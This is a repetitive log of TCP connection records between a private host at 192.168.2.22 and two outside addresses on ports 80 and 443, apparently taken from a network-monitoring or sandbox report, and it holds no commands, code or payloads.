            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
